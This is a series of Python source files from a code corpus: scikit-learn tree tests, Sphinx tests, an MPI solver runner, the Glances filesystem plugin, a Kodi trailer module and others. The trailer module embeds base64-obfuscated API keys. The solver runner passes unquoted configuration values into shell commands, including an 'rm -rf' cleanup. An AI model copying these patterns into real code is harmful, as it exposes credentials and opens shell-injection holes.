print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, obj_type)
result = url_cache.get_cached_url(url)
if result != None:
return result
data = self.rest_simple_request("%s?%s__exact=%s" % (url, key, urllib.quote_plus(val)))
entries = json.loads(data)
url_cache.save_url(url, entries)
return entries
def rest_query_objects(self, obj_type, query_params=None):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, obj_type)
if query_params:
url += '?'
# Convert any data:None fields to <id>__isnull=True
non_null_query_params = dict([[n,v] if v != None else [n + '__isnull', True]
for (n,v) in query_params.items()])
url += urllib.urlencode(non_null_query_params)
result = url_cache.get_cached_url(url)
if result != None:
r |
seckcoder/lang-learn | python/sklearn/sklearn/tree/tests/test_tree.py | Python | unlicense | 15,491 | 0.001291 | """
Testing for the tree module (sklearn.tree).
"""
import numpy as np
from numpy.testing import assert_array_equal
from numpy.testing import assert_array_almost_equal
from numpy.testing import assert_almost_equal
from numpy.testing import assert_equal
from nose.tools import assert_raises
from nose.tools import assert_true
from sklearn import tree
from sklearn import datasets
# toy sample
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
true_result = [-1, 1, 1]
# also load the iris dataset
# and randomly permute | it
iris = datasets.load_iris()
rng = np.random.RandomState(1)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# also load the boston dataset
# and randomly permute it
boston = datasets.load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_classification_toy():
"""Check classification on a toy dataset."""
clf = tree.De | cisionTreeClassifier()
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
# With subsampling
clf = tree.DecisionTreeClassifier(max_features=1, random_state=1)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
def test_regression_toy():
"""Check regression on a toy dataset."""
clf = tree.DecisionTreeRegressor()
clf.fit(X, y)
assert_almost_equal(clf.predict(T), true_result)
# With subsampling
clf = tree.DecisionTreeRegressor(max_features=1, random_state=1)
clf.fit(X, y)
assert_almost_equal(clf.predict(T), true_result)
def test_xor():
"""Check on a XOR problem"""
y = np.zeros((10, 10))
y[:5, :5] = 1
y[5:, 5:] = 1
gridx, gridy = np.indices(y.shape)
X = np.vstack([gridx.ravel(), gridy.ravel()]).T
y = y.ravel()
clf = tree.DecisionTreeClassifier()
clf.fit(X, y)
assert_equal(clf.score(X, y), 1.0)
clf = tree.DecisionTreeClassifier(max_features=1)
clf.fit(X, y)
assert_equal(clf.score(X, y), 1.0)
clf = tree.ExtraTreeClassifier()
clf.fit(X, y)
assert_equal(clf.score(X, y), 1.0)
clf = tree.ExtraTreeClassifier(max_features=1)
clf.fit(X, y)
assert_equal(clf.score(X, y), 1.0)
def test_graphviz_toy():
"""Check correctness of graphviz output on a toy dataset."""
clf = tree.DecisionTreeClassifier(max_depth=3, min_samples_split=1)
clf.fit(X, y)
from StringIO import StringIO
# test export code
out = StringIO()
tree.export_graphviz(clf, out_file=out)
contents1 = out.getvalue()
tree_toy = StringIO("digraph Tree {\n"
"0 [label=\"X[0] <= 0.0000\\nerror = 0.5"
"\\nsamples = 6\\nvalue = [ 3. 3.]\", shape=\"box\"] ;\n"
"1 [label=\"error = 0.0000\\nsamples = 3\\nvalue = [ 3. 0.]\", shape=\"box\"] ;\n"
"0 -> 1 ;\n"
"2 [label=\"error = 0.0000\\nsamples = 3\\nvalue = [ 0. 3.]\", shape=\"box\"] ;\n"
"0 -> 2 ;\n"
"}")
contents2 = tree_toy.getvalue()
assert contents1 == contents2, \
"graphviz output test failed\n: %s != %s" % (contents1, contents2)
# test with feature_names
out = StringIO()
out = tree.export_graphviz(clf, out_file=out,
feature_names=["feature1", ""])
contents1 = out.getvalue()
tree_toy = StringIO("digraph Tree {\n"
"0 [label=\"feature1 <= 0.0000\\nerror = 0.5"
"\\nsamples = 6\\nvalue = [ 3. 3.]\", shape=\"box\"] ;\n"
"1 [label=\"error = 0.0000\\nsamples = 3\\nvalue = [ 3. 0.]\", shape=\"box\"] ;\n"
"0 -> 1 ;\n"
"2 [label=\"error = 0.0000\\nsamples = 3\\nvalue = [ 0. 3.]\", shape=\"box\"] ;\n"
"0 -> 2 ;\n"
"}")
contents2 = tree_toy.getvalue()
assert contents1 == contents2, \
"graphviz output test failed\n: %s != %s" % (contents1, contents2)
# test improperly formed feature_names
out = StringIO()
assert_raises(IndexError, tree.export_graphviz,
clf, out, feature_names=[])
def test_iris():
"""Check consistency on dataset iris."""
for c in ('gini',
'entropy'):
clf = tree.DecisionTreeClassifier(criterion=c).fit(iris.data,
iris.target)
score = np.mean(clf.predict(iris.data) == iris.target)
assert score > 0.9, "Failed with criterion " + c + \
" and score = " + str(score)
clf = tree.DecisionTreeClassifier(criterion=c,
max_features=2,
random_state=1).fit(iris.data,
iris.target)
score = np.mean(clf.predict(iris.data) == iris.target)
assert score > 0.5, "Failed with criterion " + c + \
" and score = " + str(score)
def test_boston():
"""Check consistency on dataset boston house prices."""
for c in ('mse',):
clf = tree.DecisionTreeRegressor(criterion=c).fit(boston.data,
boston.target)
score = np.mean(np.power(clf.predict(boston.data) - boston.target, 2))
assert score < 1, "Failed with criterion " + c + \
" and score = " + str(score)
clf = tree.DecisionTreeRegressor(criterion=c,
max_features=6,
random_state=1).fit(boston.data,
boston.target)
#using fewer features reduces the learning ability of this tree,
# but reduces training time.
score = np.mean(np.power(clf.predict(boston.data) - boston.target, 2))
assert score < 2, "Failed with criterion " + c + \
" and score = " + str(score)
def test_probability():
"""Predict probabilities using DecisionTreeClassifier."""
clf = tree.DecisionTreeClassifier(max_depth=1, max_features=1,
random_state=42)
clf.fit(iris.data, iris.target)
prob_predict = clf.predict_proba(iris.data)
assert_array_almost_equal(
np.sum(prob_predict, 1), np.ones(iris.data.shape[0]))
assert np.mean(np.argmax(prob_predict, 1)
== clf.predict(iris.data)) > 0.9
assert_almost_equal(clf.predict_proba(iris.data),
np.exp(clf.predict_log_proba(iris.data)), 8)
def test_arrayrepr():
"""Check the array representation."""
# Check resize
clf = tree.DecisionTreeRegressor(max_depth=None)
X = np.arange(10000)[:, np.newaxis]
y = np.arange(10000)
clf.fit(X, y)
def test_pure_set():
"""Check when y is pure."""
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y = [1, 1, 1, 1, 1, 1]
clf = tree.DecisionTreeClassifier().fit(X, y)
assert_array_equal(clf.predict(X), y)
clf = tree.DecisionTreeRegressor().fit(X, y)
assert_array_equal(clf.predict(X), y)
def test_numerical_stability():
"""Check numerical stability."""
old_settings = np.geterr()
np.seterr(all="raise")
X = np.array([
[152.08097839, 140.40744019, 129.75102234, 159.90493774],
[142.50700378, 135.81935120, 117.82884979, 162.75781250],
[127.28772736, 140.40744019, 129.75102234, 159.90493774],
[132.37025452, 143.71923828, 138.35694885, 157.84558105],
[103.10237122, 143.71928406, 138.35696411, 157.84559631],
[127.71276855, 143.71923828, 138.35694885, 157.84558105],
[120.91514587, 140.40744019, 129.75102234, 159.90493774]])
y = np.array(
[1., 0.70209277, 0.53896582, 0., 0.90914464, 0.48026916, 0.49622521])
dt = tree.DecisionTreeRegressor()
dt.fit(X, y)
dt.fit(X, -y)
dt.fit(-X, y)
dt.fit(-X, -y)
np.seterr(**old_settings)
def test_importances():
"""Check variable importances."""
X, y = datasets.make_classification(n_samples=1000,
n_features=10,
n_informative=3,
n_redundant=0,
|
lsst-sqre/sphinxkit | tests/test_sphinxext_mockcoderefs.py | Python | mit | 1,652 | 0 | """Tests for documenteer.sphinext.mockcoderefs."""
from shutil import rmtree
from tempfile import mkdtemp
import pytest
from sphinx.application import Sphinx
import documenteer.sphinxext.mockcoderefs as mockcoderefs
try:
from unittest.mock import Mock
except ImportError:
from mock import Mock
@pytest.fixture()
def app(request):
src = mkdtemp()
doctree = mkdtemp()
confdir = mkdtemp()
outdir = mkdtemp()
Sphinx._log = lambda self, message, wfile, nonl=False: None
app = Sphinx(
srcdir=src,
confdir=None,
outdir=outdir,
doctreedir=doctree,
bui | ldername="html",
)
mockcoderefs.setup(app)
# Stitch together as the sphinx app init() usually does w/ real conf files
tr | y:
app.config.init_values()
except TypeError:
# Sphinx < 1.6.0
app.config.init_values(Sphinx._log)
def fin():
for dirname in (src, doctree, confdir, outdir):
rmtree(dirname)
request.addfinalizer(fin)
return app
@pytest.fixture()
def inliner(app):
return Mock(document=Mock(settings=Mock(env=Mock(app=app))))
@pytest.mark.parametrize(
"test_input,expected",
[
(("lmod", "lsst.afw"), "lsst.afw"),
(("lmod", "~lsst.afw"), "afw"),
(("lmod", "~lsst"), "lsst"),
],
)
def test_mock_code_ref_role(inliner, test_input, expected):
role_name, role_content = test_input
result = mockcoderefs.mock_code_ref_role(
name=role_name,
rawtext=role_content,
text=role_content,
inliner=inliner,
lineno=None,
)
assert result[0][0].astext() == expected
|
ogbash/doug | scripts/doug/execution.py | Python | lgpl-2.1 | 8,926 | 0.004593 | import subprocess
import re
import copy
from StringIO import StringIO
import os
import doug
from doug.config import DOUGConfigParser, ControlFile
from scripts import ScriptException
import logging
LOG = logging.getLogger('doug')
_defaultConfig = None
def getDefaultConfig():
global _defaultConfig
if _defaultConfig is None:
_defaultConfig = DOUGConfigParser(name="DOUG default config")
_defaultConfig.addConfigContents(doug.execution_conf_tmpl)
return _defaultConfig
def getDefaultControlFile(basedir):
cf = ControlFile(contents=doug.DOUG_ctl_tmpl, basedir=basedir)
cf.name = '<doug.DOUG_ctl_tmpl>'
return cf
class DOUGExecution:
def __init__(self, config, dougControls=None):
self.workdir = os.path.abspath(config.get('doug', 'workdir'))
self.config = DOUGConfigParser(name='DOUG execution', basedir=self.workdir)
# default config
self.config.addConfig(getDefaultConfig())
self.config.addControlFile(getDefaultControlFile(self.workdir))
# copy controls from control file
if dougControls is not None:
self.config.addControlFile(dougControls)
# copy config
self.config.addConfig(config)
# output or other files, exception grabs it on exit
self.files = []
# how many test results are using this test, files are deleted only after last free() call
self._inUse = 0
self.preserveOutput = self.config.getboolean("doug", "preserveOutput")
self.result = DOUGConfigParser(self.config.defaults(), basedir=self.workdir)
self.result.add_section('doug-result')
def setUp(self):
LOG.debug("Preparing testing environment")
self.workdir = self.workdir
if os.path.isdir(self.workdir):
self.workdirExisted = True
else:
self.workdirExisted = False
os.mkdir(self.workdir)
LOG.debug("Working directory %s created" % self.workdir)
try:
# create control file
self.testctrlfname = os.path.abspath(os.path.join(self.workdir, 'DOUG-exec.ctl'))
controlFile = self.config.getControlFile(self.testctrlfname)
controlFile.save(self.testctrlfname)
self.files.append((self.testctrlfname, "Control file"))
# run mpiboot
mpibootname = self.config.get("doug", "mpiboot")
outfilename = self.config.get("doug", "mpiboot-outfilename")
errfilename = self.config.get("doug", "mpiboot-errfilename")
if mpibootname:
LOG.debug("Setting up mpi")
mpiboot = subprocess.Popen("%s > %s 2> %s" % (mpibootname, outfilename, errfilename), shell=True)
res = mpiboot.wait()
if res:
raise ScriptException("Error running %s (%d)"
"inspect output files (%s, %s) for error description."
% (mpibootname, res, outfilename, errfilename))
except:
self._clean()
raise
def tearDown(self):
try:
mpihaltname = self.config.get("doug", "mpihalt")
if mpihaltname:
outfilename = self.config.get("doug", "mpihalt-outfilename")
errfilename = self.config.get("doug", "mpihalt-errfilename")
LOG.debug("Shutting down mpi")
mpihalt = subprocess.Popen("%s > %s 2> %s" % (mpihaltname, outfilename, errfilename), shell=True)
import time
time.sleep(4) # lamhalt <=7.1.1 does not wait until whole universe is shut down
res = mpihalt.wait()
if res:
LOG.warn("Error running %s (%d)"
"inspect output files (%s, %s) for error description."
% (mpihaltname, res, outfilename, errfilename))
except Exception, e:
LOG.warn("Exception running mpihalt: %s" % e)
def _clean(self):
if not self.preserveOutput and not self.workdirExisted:
os.system('rm -rf %s' % self.workdir)
LOG.debug("Temporary directory %s deleted" % self.workdir)
def acquire(self):
self._inUse += 1
def free(self):
self._inUse -= 1
if self._inUse == 0:
self._clean()
def run(self):
return self.runDOUG()
def runDOUG(self):
LOG.debug("Running DOUG")
nproc = self.config.getint('doug', 'nproc')
solver = self.config.getint('doug-controls', 'solver')
nsubdomains = self.config.getint('doug-controls', 'num_subdomains')
levels = self.config.getint('doug-controls', 'levels')
method = self.config.getint('doug-controls', 'method')
fine_method = self.config.getint('doug-controls', 'fine_method')
smoothers = self.config.getint('doug-controls', 'smoothers')
overlap = self.config.getint('doug-controls', 'overlap')
LOG.info("solver=%d, method=%d, levels=%d, fine_method=%d, num_subdomains=%d, nproc=%d, overlap=%d, smoothers=%d" % (solver, method, levels, fine_method, nsubdomains, nproc, overlap, smoothers))
mpirun = self.config.get("doug", "mpirun")
main = self.config.get("doug", "executable")
bindir = self.config.get("doug", "bindir")
main = os.path.join(bindir, main)
errfname = self.config.getpath("doug", "errfilename")
outfname = self.config.getpath("doug", "outfilename")
solutionfname = self.config.getpath('doug-controls', 'solution_file')
curdir = os.getcwd()
result = self.result
try:
LOG.debug("Changing directory to %s" % self.workdir)
os.chdir(self.workdir)
outf = open(outfname, "w")
errf = open(errfname, "w")
try:
args = [mpirun, "-np", "%d"%nproc, main, "-f", self.testctrlfname, "-p"]
LOG.info("Running %s" % " ".join(args))
doug = subprocess.Popen(args, stdout=outf, stderr=errf)
import time
maxtime = self.config.getint('doug', 'max-time')
for i in xrange(maxtime): # ~1 minute
time.sleep(1)
doug.poll()
if doug.returncode != None:
break
else:
LOG.info("Terminating DOUG")
doug.terminate()
doug.wait()
value = doug.returncode
LOG.debug("Finished %s with code %d" % (mpirun, value))
self.files.append((outfname, "%s standard output" % mpirun))
self.files.append((errfname, "%s standard error" % mpirun))
result.setpath('doug-result', 'returnvalue', str(value))
result.setpath('doug-result', 'outputfile', outfname)
result.setpath('doug-result', 'errorfile', errfname)
if value != 0:
se = ScriptException("Error occured while running doug (value=%d), "
"inspect output files (%s, %s) for error description." %
(value, outfname, errfname))
raise se
if solutionfname and os.path.isfile(solutionfname):
result.setpath('doug-result', 'solutionfile', solutionfname)
if solutionfname and os.path.isfile('aggr1.t | xt'):
result.setpath('doug-result', 'fineaggrsfile', 'aggr1.txt')
#self.files | .append(("aggr1.txt", "Fine aggregates"))
if solutionfname and os.path.isfile('aggr2.txt'):
result.setpath('doug-result', 'coarseaggrsfile', 'aggr2.txt')
#self.files.append(("aggr2.txt", "Coarse aggregates"))
files = os.listdir(self.workdir)
files = filter(lambda name: name.startswith('prof. |
huijunwu/heron | heron/tools/ui/src/python/handlers/api/__init__.py | Python | apache-2.0 | 1,275 | 0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
''' api module '''
from .metrics import (
MetricsHandler,
MetricsTimelineHandler
)
from .topology import (
TopologyExceptionSummaryHandler,
ListTopologiesJsonHandler,
Top | ologyLogicalPlanJsonHandler,
TopologyPackingPlanJsonHandler,
TopologyPhysicalPlanJsonHandler,
TopologySchedulerLocationJsonHandler,
TopologyExecutionStateJsonHandler,
TopologyExceptionsJsonHandler,
PidHan | dler,
JstackHandler,
MemoryHistogramHandler,
JmapHandler
)
|
subodhchhabra/glances | glances/plugins/glances_fs.py | Python | lgpl-3.0 | 10,262 | 0.001169 | # -*- coding: utf-8 -*-
#
# This file is part of Glances.
#
# Copyright (C) 2015 Nicolargo <nicolas@nicolargo.com>
#
# Glances is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Glances is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""File system plugin."""
import operator
from glances.plugins.glances_plugin import GlancesPlugin
import psutil
# SNMP OID
# The snmpd.conf needs to be edited.
# Add the following to enable it on all disk
# ...
# includeAllDisks 10%
# ...
# The OIDs are as follows (for the first disk)
# Path where the disk is mounted: .1.3.6.1.4.1.2021.9.1.2.1
# Path of the device for the partition: .1.3.6.1.4.1.2021.9.1.3.1
# Total size of the disk/partion (kBytes): .1.3.6.1.4.1.2021.9.1.6.1
# Available space on the disk: .1.3.6.1.4.1.2021.9.1.7.1
# Used space on the disk: .1.3.6.1.4.1.2021.9.1.8.1
# Percentage of space used on disk: .1.3.6.1.4.1.2021.9.1.9.1
# Percentage of inodes used on disk: .1.3.6.1.4.1.2021.9.1.10.1
snmp_oid = {'default': {'mnt_point': '1.3.6.1.4.1.2021.9.1.2',
'device_name': '1.3.6.1.4.1.2021.9.1.3',
'size': '1.3.6.1.4.1.2021.9.1.6',
'used': '1.3.6.1.4.1.2021.9.1.8',
'percent': '1.3.6.1.4.1.2021.9.1.9'},
'windows': {'mnt_point': '1.3.6.1.2.1.25.2.3.1.3',
'alloc_unit': '1.3.6.1.2.1.25.2.3.1.4',
'size': '1.3.6.1.2.1.25.2.3.1.5',
'used': '1.3.6.1.2.1.25.2.3.1.6'},
'netapp': {'mnt_point': '1.3.6.1.4.1.789.1.5.4.1.2',
'device_name': '1.3.6.1.4.1.789.1.5.4.1.10',
'size': '1.3.6.1.4.1.789.1.5.4.1.3',
'used': '1.3.6.1.4.1.789.1.5.4.1.4',
'percent': '1.3.6.1.4.1.789.1.5.4.1.6'}}
snmp_oid['esxi'] = snmp_oid['windows']
# Define the history items list
# All items in this list will be historised if the --enable-history tag is set
# 'color' define the graph color in #RGB format
items_history_list = [{'name': 'percent', 'color': '#00FF00'}]
class Plugin(GlancesPlugin):
"""Glances file system plugin.
stats is a list
"""
def __init__(self, args=None):
"""Init the plugin."""
super(Plugin, self).__init__(args=args, items_history_list=items_history_list)
# We want to display the stat in the curse interface
self.display_curse = True
# Init the stats
self.reset()
def get_key(self):
"""Return the key of the list."""
return 'mnt_point'
def reset(self):
"""Reset/init the stats."""
self.stats = []
@GlancesPlugin._log_result_decorator
def update(self):
"""Update the FS stats using the input method."""
# Reset the list
self.reset()
if self.input_method == 'local':
# Update stats using the standard system lib
# Grab the stats using the PsUtil disk_partitions
# If 'all'=False return physical devices only (e.g. hard disks, cd-rom drives, USB keys)
# and ignore all others (e.g. memory partitions such as /dev/shm)
try:
fs_stat = psutil.disk_partitions(all=False)
except UnicodeDecodeError:
return self.stats
# Optionnal hack to allow logicals mounts points (issue #448)
# Ex: Had to put 'allow=zfs' in the [fs] section of the conf file
# to allow zfs monitoring
for fstype in self.get_conf_value('allow'):
try:
fs_stat += [f for f in psutil.disk_partitions(all=True) if f.fstype.find(fstype) >= 0]
except UnicodeDecodeError:
return self.stats
# Loop over fs
for fs in fs_stat:
# Do not take hidden file system into account
if self.is_hide(fs.mountpoint):
continue
# Grab the disk usage
try:
fs_usage = psutil.disk_usage(fs.mountpoint)
except OSError:
# Correct issue #346
# Disk is ejected during the command
| continue
fs_current = {
'device_name': fs.device,
'fs_type': fs.fstype,
'mnt_point': fs.mountpoint,
| 'size': fs_usage.total,
'used': fs_usage.used,
'free': fs_usage.free,
'percent': fs_usage.percent,
'key': self.get_key()}
self.stats.append(fs_current)
elif self.input_method == 'snmp':
# Update stats using SNMP
# SNMP bulk command to get all file system in one shot
try:
fs_stat = self.get_stats_snmp(snmp_oid=snmp_oid[self.short_system_name],
bulk=True)
except KeyError:
fs_stat = self.get_stats_snmp(snmp_oid=snmp_oid['default'],
bulk=True)
# Loop over fs
if self.short_system_name in ('windows', 'esxi'):
# Windows or ESXi tips
for fs in fs_stat:
# Memory stats are grabbed in the same OID table (ignore it)
if fs == 'Virtual Memory' or fs == 'Physical Memory' or fs == 'Real Memory':
continue
size = int(fs_stat[fs]['size']) * int(fs_stat[fs]['alloc_unit'])
used = int(fs_stat[fs]['used']) * int(fs_stat[fs]['alloc_unit'])
percent = float(used * 100 / size)
fs_current = {
'device_name': '',
'mnt_point': fs.partition(' ')[0],
'size': size,
'used': used,
'percent': percent,
'key': self.get_key()}
self.stats.append(fs_current)
else:
# Default behavior
for fs in fs_stat:
fs_current = {
'device_name': fs_stat[fs]['device_name'],
'mnt_point': fs,
'size': int(fs_stat[fs]['size']) * 1024,
'used': int(fs_stat[fs]['used']) * 1024,
'percent': float(fs_stat[fs]['percent']),
'key': self.get_key()}
self.stats.append(fs_current)
# Update the history list
self.update_stats_history('mnt_point')
# Update the view
self.update_views()
return self.stats
def update_views(self):
"""Update stats views."""
# Call the father's method
super(Plugin, self).update_views()
# Add specifics informations
# Alert
for i in self.stats:
self.views[i[self.get_key()]]['used']['decoration'] = self.get_alert(
i['used'], maximum=i['size'], header=i['mnt_point'])
def msg_curse(self, args=None, max_width=None):
"""Return the dict to display in the curse interface."""
# Init the return message
ret = []
# Only process if stats exist and display plugin enable...
if not self.stats or args.disable_fs:
return ret
# Max size for the fsname name
if max_width is not None and max_width >= 23:
# Interface size name = max_width - space for interfaces bitrat |
TakeshiTseng/HyperRyu | hyper_ryu/vtopo/vtopo.py | Python | mit | 884 | 0 | '''
Virtual topology
'''
class VTopo(object):
'''
Attributes:
- switches : virtual switch list
- links : virtual links
'''
def __init__(self):
super(VTopo, self).__init__()
self.isStart = False
self.switches = []
self.links = []
def addSwitch(self, vswitch):
'''
Add new virtual switch
Mapping between physi | cal and virtual automatically
'''
pass
def addLink(self, vlink):
'''
Add new virtual link
Mapping between physical and virtual automatically
'''
pass
def getVPSwitchMapping(self, vswitch):
'''
get virtual to physical mapping
'''
pass
def getPVSwitchMapping(self, pswitch):
'''
get physical to virtual mapping
'''
pa | ss
def start(self):
pass
|
Coelhon/MasterRepo.repository | plugin.video.zen/resources/lib/modules/trailer.py | Python | gpl-2.0 | 3,897 | 0.010521 | # -*- coding: utf-8 -*-
'''
zen Add-on
Copyright (C) 2016 zen
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,json,urlparse,base64,random
from resources.lib.modules import client
from resources.lib.modules import control
class trailer:
def __init__(self):
self.base_link = 'http://www.youtube.com'
self.key_link = random.choice(['QUl6YVN5RDd2aFpDLTYta2habTVuYlVyLTZ0Q0JRQnZWcnFkeHNz', 'QUl6YVN5Q2RiNEFNenZpVG0yaHJhSFY3MXo2Nl9HNXBhM2ZvVXd3'])
self.key_link = '&key=%s' % base64.urlsafe_b64decode(self.key_link)
self.search_link = 'https://www.googleapis.com/youtube/v3/search?part=snippet&type=video&maxResults=5&q=%s'
self.youtube_search = 'https://www.googleapis.com/youtube/v3/search?q='
self.youtube_watch = 'http://www.youtube.com/watch?v=%s'
def play(self, name, url=None):
try:
url = self.worker(name, url)
if url == None: return
title = control.infoLabel('listitem.title')
if title == '': title = control.infoLabel('listitem.label')
icon = control.infoLabel('listitem.icon')
item = control.item(path=url, iconImage=icon, thumbnailImage=ico | n)
try: item.setArt({'icon': icon})
except: pass
item.setInfo(type='Video', infoLabels = {'title': title})
control.player.play(url, item)
except:
pass
def worker(self, name, url):
try:
if url.startswith(self.base_link):
url = self.resolve(url)
if url == None: raise Exception()
return url
elif not url.startswith('http://'):
| url = self.youtube_watch % url
url = self.resolve(url)
if url == None: raise Exception()
return url
else:
raise Exception()
except:
query = name + ' trailer'
query = self.youtube_search + query
url = self.search(query)
if url == None: return
return url
def search(self, url):
try:
query = urlparse.parse_qs(urlparse.urlparse(url).query)['q'][0]
url = self.search_link % urllib.quote_plus(query) + self.key_link
result = client.request(url)
items = json.loads(result)['items']
items = [(i['id']['videoId']) for i in items]
for url in items:
url = self.resolve(url)
if not url is None: return url
except:
return
def resolve(self, url):
try:
id = url.split('?v=')[-1].split('/')[-1].split('?')[0].split('&')[0]
result = client.request('http://www.youtube.com/watch?v=%s' % id)
message = client.parseDOM(result, 'div', attrs = {'id': 'unavailable-submessage'})
message = ''.join(message)
alert = client.parseDOM(result, 'div', attrs = {'id': 'watch7-notification-area'})
if len(alert) > 0: raise Exception()
if re.search('[a-zA-Z]', message): raise Exception()
url = 'plugin://plugin.video.youtube/play/?video_id=%s' % id
return url
except:
return
|
osigaud/ArmModelPython | Control/Experiments/Experiments.py | Python | gpl-2.0 | 14,422 | 0.014284 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Author: Thomas Beucher
Module: Experiments
Description: Class used to generate all the trajectories of the experimental setup and also used for CMAES optimization
'''
import numpy as np
import time
#from Utils.ThetaNormalization import normalization, unNormalization
from GlobalVariables import pathDataFolder
from TrajMaker import TrajMaker
from Utils.FileWriting import checkIfFolderExists, findDataFilename, writeArray
from multiprocess.pool import Pool
from functools | import partial
#------------------------------------------------------------------------------
class Experiments:
def __init__(self, rs, sizeOfTarget, saveTraj, foldername, thetafile, popSize, period, estim="Inv"):
'''
Initializes parameters used to run functions below
Inputs:
'''
self.rs = rs
| self.name = "Experiments"
self.call = 0
self.dimState = rs.inputDim
self.dimOutput = rs.outputDim
self.numberOfRepeat = rs.numberOfRepeatEachTraj
self.foldername = foldername
self.tm = TrajMaker(rs, sizeOfTarget, saveTraj, thetafile, estim)
self.posIni = np.loadtxt(pathDataFolder + rs.experimentFilePosIni)
if(len(self.posIni.shape)==1):
self.posIni=self.posIni.reshape((1,self.posIni.shape[0]))
self.costStore = []
self.cost12Store=[]
self.CMAESCostStore = []
self.CMAESTimeStore = []
self.trajTimeStore = []
self.bestCost = -10000.0
self.lastCoord = []
self.popSize = popSize
self.period = period
def printLastCoordInfo(self):
vec = np.array(self.lastCoord)
print ("moyenne : "+ str(np.mean(vec)))
print ("min : " + str(np.min(vec)))
print ("max :" + str(np.max(vec)))
def initTheta(self, theta):
'''
Input: -theta: controller ie vector of parameters, numpy array
'''
self.theta=theta
self.tm.setTheta(self.theta)
def saveCost(self):
'''
filename = findDataFilename(self.foldername+"Cost/","traj",".cost")
filenameTime = findDataFilename(self.foldername+"TrajTime/","traj",".time")
filenameX = findDataFilename(self.foldername+"finalX/","x",".last")
np.savetxt(filename, self.costStore)
np.savetxt(filenameTime, self.trajTimeStore)
np.savetxt(filenameX, self.lastCoord)
'''
writeArray(self.costStore,self.foldername+"Cost/","traj",".cost")
writeArray(self.cost12Store,self.foldername+"CostU12/","traj",".cost")
writeArray(self.trajTimeStore, self.foldername+"TrajTime/","traj",".time")
writeArray(self.lastCoord, self.foldername+"finalX/","x",".last")
def setNoise(self, noise):
self.tm.setnoise(noise)
def runOneTrajectory(self, x, y):
#self.tm.saveTraj = True
cost, trajTime, lastX = self.tm.runTrajectory(x, y, self.foldername)
#cost, trajTime, lastX = self.tm.runTrajectoryOpti(x, y)
#print "Exp local x y cost : ", x, y, cost
if lastX != -1000:
self.lastCoord.append(lastX)
return cost, trajTime
def runRichTrajectories(self, repeat):
globCost = []
xy = np.loadtxt(pathDataFolder + "PosCircu540")
#xy = np.loadtxt(pathDataFolder + "PosSquare")
for el in xy:
costAll, trajTimeAll = np.zeros(repeat), np.zeros(repeat)
for i in range(repeat):
costAll[i], trajTimeAll[i] = self.runOneTrajectory(el[0], el[1])
meanCost = np.mean(costAll)
meanTrajTime = np.mean(trajTimeAll)
self.costStore.append([el[0], el[1], meanCost])
self.trajTimeStore.append([el[0], el[1], meanTrajTime])
globCost.append(meanCost)
return np.mean(globCost)
def runTrajectoriesForResultsGeneration(self, repeat):
globMeanCost=0.
globTimeCost=0.
for xy in self.posIni:
costAll, trajTimeAll, costU12 = np.zeros(repeat), np.zeros(repeat), np.zeros(repeat)
for i in range(repeat):
costAll[i], trajTimeAll[i] = self.runOneTrajectory(xy[0], xy[1])
costU12[i] = self.tm.costU12
meanCost = np.mean(costAll)
meanTrajTime = np.mean(trajTimeAll)
meanCostU12=np.mean(costU12)
self.costStore.append([xy[0], xy[1], meanCost])
self.trajTimeStore.append([xy[0], xy[1], meanTrajTime])
self.cost12Store.append([xy[0], xy[1], meanCostU12])
globMeanCost+=meanCost
globTimeCost+=meanTrajTime
#self.printLastCoordInfo()
return globMeanCost/len(self.posIni), globTimeCost/len(self.posIni)
def runTrajectoriesForResultsGenerationNController(self, repeat, thetaName):
globMeanCost=0.
globTimeCost=0.
for enum,xy in enumerate(self.posIni):
try :
costAll, trajTimeAll, costU12 = np.zeros(repeat), np.zeros(repeat), np.zeros(repeat)
controllerFileName = thetaName.replace("*",str(enum))
self.tm.controller.load(controllerFileName)
for i in range(repeat):
costAll[i], trajTimeAll[i] = self.runOneTrajectory(xy[0], xy[1])
costU12[i] = self.tm.costU12
meanCost = np.mean(costAll)
meanTrajTime = np.mean(trajTimeAll)
meanCostU12=np.mean(costU12)
self.costStore.append([xy[0], xy[1], meanCost])
self.trajTimeStore.append([xy[0], xy[1], meanTrajTime])
self.cost12Store.append([xy[0], xy[1], meanCostU12])
globMeanCost+=meanCost
globTimeCost+=meanTrajTime
except IOError:
pass
#self.printLastCoordInfo()
